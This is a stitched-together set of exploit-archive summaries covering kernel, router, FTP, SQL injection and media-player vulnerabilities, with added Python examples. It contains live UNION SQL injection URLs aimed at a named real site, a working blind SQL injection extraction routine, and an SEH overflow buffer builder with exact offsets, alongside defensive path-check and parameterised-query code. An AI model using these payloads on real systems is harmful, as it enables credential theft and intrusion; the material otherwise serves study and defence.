This exploit is a proof-of-concept for a local kernel memory leak/DoS vulnerability in Apple Mac OS X xnu <= 1228.3.13. It calls the profil system call and fills up to 65536 * 128 bytes of kernel memory, which can lead to a denial of service or a potential information leak.
This exploit is a local kernel root exploit for FreeBSD 7.0 and 7.1. It abuses a vulnerability in the ktimer_create() function to overwrite an itimer struct so that the kernel ends up executing the exploit's give_me_root() function, which grants the calling user root privileges.
After establishing a TCP connection to the affected device on port 53 from the LAN interface and then closing the connection, the router restarts. In some tests using the web trigger with Internet Explorer, the WAN configuration (IP, gateway IP, DNS servers) of the device was lost and a hardware reset was needed to make the device usable again. The issue can be triggered from the LAN interface by a direct connection or by specially crafted web content. For web content to trigger the issue, a browser without security restrictions on connections to port 53 must be used; in the tests performed, Internet Explorer was the only browser capable of activating the bug.
This exploit relates to Errata Notice 09:01 from FreeBSD.org. It is a local exploit that causes a kernel panic by calling the kenv() function with a large value as its third argument. It was published on milw0rm.com in 2009.
X-BLC is a dynamic web content management system written in PHP. A SQL injection vulnerability in X-BLC <= 0.2.0 allows an attacker to extract data from the database. It is caused by insufficient sanitization of user-supplied input in the 'include/get_read.php' script; an attacker can exploit it by sending a specially crafted HTTP request containing SQL statements to that script and retrieve data such as usernames and passwords.
In both cases the IE security settings were the defaults for the Internet zone. Exploitation tests completed successfully without any warnings or other interaction from Internet Explorer. To test, first create a "test.txt" file in the C: root directory, then open the page in IE and click the test button. "test.txt" should now be deleted :)
A vulnerability is caused by an input validation error when handling FTP "DELE" requests. This can be exploited to escape the FTP root and delete arbitrary files on the system via directory traversal using the "..//" character sequence.
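The check a DELE handler needs is containment of the resolved path inside the FTP root, not a search for "../" substrings. The following is an added example (not code from the affected server or this advisory) that normalises the requested path and rejects anything that leaves the root; the FTP_ROOT value and the sample requests, including the "..//" form from the advisory, are constructed for illustration.

```python
import posixpath

# Hypothetical FTP root for this example; the advisory does not name one.
FTP_ROOT = "/srv/ftp"


def resolve_dele_target(ftp_root, requested):
    """Return the absolute path a DELE request may act on, or None if the
    request would escape ftp_root.

    The path is normalised first (collapsing '//' and resolving '..'
    segments, which handles the '..//' sequence from the advisory) and the
    result must then lie inside ftp_root. Comparing normalised paths rather
    than looking for '../' substrings avoids filter-bypass variants.
    """
    # Windows-hosted FTP servers commonly accept '\' as a separator too;
    # treat it as '/' so it cannot be used to slip past the check.
    requested = requested.replace("\\", "/")
    # A leading '/' in FTP means the FTP root, not the filesystem root.
    joined = posixpath.join(ftp_root, requested.lstrip("/"))
    normalised = posixpath.normpath(joined)
    root = posixpath.normpath(ftp_root)
    # The trailing '/' matters: without it '/srv/ftp2/x' would pass as
    # a child of '/srv/ftp'.
    if normalised != root and not normalised.startswith(root + "/"):
        return None
    return normalised


def classify_requests(ftp_root, requests):
    """Map each constructed DELE argument to the path it would resolve to
    (or None when rejected), for a quick overview of the check."""
    return {req: resolve_dele_target(ftp_root, req) for req in requests}


if __name__ == "__main__":
    samples = ["pub/file.txt", "pub/../file.txt", "..//..//etc/passwd",
               "/..//..//etc/passwd", "..\\..\\boot.ini", "../ftp2/x"]
    for req, target in classify_requests(FTP_ROOT, samples).items():
        print(f"{req!r:28} -> {'REJECT' if target is None else target}")
```

On a real server the returned path should additionally be passed through os.path.realpath and re-checked, since a symlink inside the root can point outside it; that step needs a live filesystem and is left out here.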
SuperNews 1.5 is vulnerable to SQL injection in the 'valor.php' script through the 'noticia' parameter. An attacker can exploit this to read the database and extract sensitive information. The vulnerable URL has the form http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]. Example injections (a six-column UNION SELECT, first returning the database name, then dumping the user and pass columns of the login table): http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5-- and http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--.
This exploit targets a blind SQL injection vulnerability in WBB3 rGallery. It combines a user ID with a User Gallery userID to exploit the vulnerability and extract the password and salt of that user.
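The three PHP SQL injections above (X-BLC get_read.php, SuperNews valor.php and the blind rGallery case) share one root cause and two extraction styles. The example below is added here and is not code from any of those projects: it models the injectable pattern in Python with an in-memory SQLite database, runs the six-column UNION payload from the SuperNews entry against it, recovers a password and salt one character at a time through a boolean (true/false page) oracle as a blind injection does, and shows the parameterised query that closes the hole. Table and column names (noticias, login.user/pass/salt) and all rows are constructed; SQLite function names (length, substr, unicode) stand in for their MySQL equivalents, and the MySQL-only database() payload from the page is not reproduced.

```python
import sqlite3

USER_PASS_PAYLOAD = "-1 union select 0,1,2,user,pass,5 from login--"  # from the page


def build_demo_db():
    """Constructed stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE noticias (id INTEGER, titulo TEXT, texto TEXT,
                               autor TEXT, data TEXT, fonte TEXT);
        INSERT INTO noticias VALUES (1, 'Titulo', 'Texto', 'Autor',
                                     '2009-01-01', 'Fonte');
        CREATE TABLE login (user TEXT, pass TEXT, salt TEXT);
        INSERT INTO login VALUES ('admin', 'a1b2c3d4', 's4lt');
    """)
    return conn


def vulnerable_lookup(conn, noticia):
    """Model of valor.php?noticia=...: the parameter is concatenated into
    the statement. Six columns are selected, which is why the page's UNION
    payload supplies exactly six values."""
    sql = ("SELECT id, titulo, texto, autor, data, fonte FROM noticias "
           "WHERE id=" + noticia)
    return conn.execute(sql).fetchone()


def safe_lookup(conn, noticia):
    """Hardened form: validate the type, then bind the value so it can
    never be parsed as SQL."""
    try:
        noticia_id = int(noticia)
    except ValueError:
        return None
    return conn.execute(
        "SELECT id, titulo, texto, autor, data, fonte FROM noticias WHERE id=?",
        (noticia_id,)).fetchone()


def blind_oracle(conn, injected):
    """Model of a blind injection point: the application reveals only
    whether a row matched (page renders or not), never the data."""
    sql = "SELECT 1 FROM noticias WHERE id=" + injected
    return conn.execute(sql).fetchone() is not None


def blind_extract(conn, column, max_len=64):
    """Recover login.<column> through the boolean oracle only: binary-search
    the length, then binary-search each character's code over printable
    ASCII. Every probe is a full injected condition on a known-good id."""
    lo, hi = 0, max_len
    while lo < hi:  # length
        mid = (lo + hi) // 2
        if blind_oracle(conn, f"1 AND (SELECT length({column}) FROM login) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:  # character at position pos
            mid = (lo + hi) // 2
            probe = (f"1 AND (SELECT unicode(substr({column},{pos},1)) "
                     f"FROM login) > {mid}")
            if blind_oracle(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_demo_db()
    print("union   :", vulnerable_lookup(db, USER_PASS_PAYLOAD))
    print("bound   :", safe_lookup(db, USER_PASS_PAYLOAD))
    print("blind   :", blind_extract(db, "pass"), blind_extract(db, "salt"))
```

The UNION call returns the login row in place of a news item, the bound version returns nothing for the same input, and the blind routine reaches the same password and salt without ever seeing query output, only the match/no-match difference.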
This exploit is a universal SEH overwrite exploit for BS.Player 2.34 (.bsl). It was written by Nine:Situations:Group::pyrokinesis and exploited by His0k4, and was tested on Windows XP Pro SP2 (French). The buffer consists of 412 'A' bytes, the 4-byte next-SEH field EB 12 41 41 (a short jump forward over the handler), the SEH handler bytes D0 26 58 02, 19 NOPs, and 343 bytes of shellcode.
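The one thing worth checking in an SEH layout like the one above is that the short jump in the next-SEH field actually lands in the NOP sled and not on the handler pointer or past the sled. The following is an added example, not the original exploit: it assembles the buffer from the sizes given in the description and computes the jump target. The shellcode is not on the page, so a 343-byte block of INT3 (0xCC) is a placeholder; the handler bytes are taken in the order listed and assumed to be the little-endian pointer as stored in memory.

```python
import struct

# Sizes and byte values from the exploit description.
PAD_LEN = 412
NSEH = b"\xEB\x12\x41\x41"        # JMP SHORT +0x12, then two filler bytes
SEH_HANDLER = b"\xD0\x26\x58\x02"  # handler bytes as listed (assumed memory order)
NOP_LEN = 19
SHELLCODE_LEN = 343
PLACEHOLDER_SHELLCODE = b"\xCC" * SHELLCODE_LEN  # constructed stand-in (INT3s)


def build_payload(shellcode=PLACEHOLDER_SHELLCODE):
    """Assemble the .bsl buffer in the order the description gives."""
    return b"A" * PAD_LEN + NSEH + SEH_HANDLER + b"\x90" * NOP_LEN + shellcode


def layout(payload):
    """Return the offsets of each field and whether the nSEH short jump
    lands inside the NOP sled."""
    nseh_off = PAD_LEN
    handler_off = nseh_off + 4
    nops_off = handler_off + 4
    sc_off = nops_off + NOP_LEN
    # JMP SHORT rel8 is relative to the byte following the 2-byte opcode.
    rel8 = struct.unpack("<b", payload[nseh_off + 1:nseh_off + 2])[0]
    jump_target = nseh_off + 2 + rel8
    handler_addr = struct.unpack("<I", payload[handler_off:handler_off + 4])[0]
    return {
        "nseh": nseh_off,
        "handler": handler_off,
        "nops": nops_off,
        "shellcode": sc_off,
        "jump_target": jump_target,
        "jump_lands_in_sled": nops_off <= jump_target < sc_off,
        "handler_addr": handler_addr,
        "handler_has_null": b"\x00" in payload[handler_off:handler_off + 4],
        "total": len(payload),
    }


if __name__ == "__main__":
    info = layout(build_payload())
    for key, value in info.items():
        print(f"{key:20} {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key:20} {value}")
```

With these sizes the jump from the nSEH field skips the 4-byte handler and the first 14 NOPs, landing 7 bytes before the shellcode, so the sled has slack on both sides; the null-byte check is the usual sanity test on a handler address that has to survive string copying.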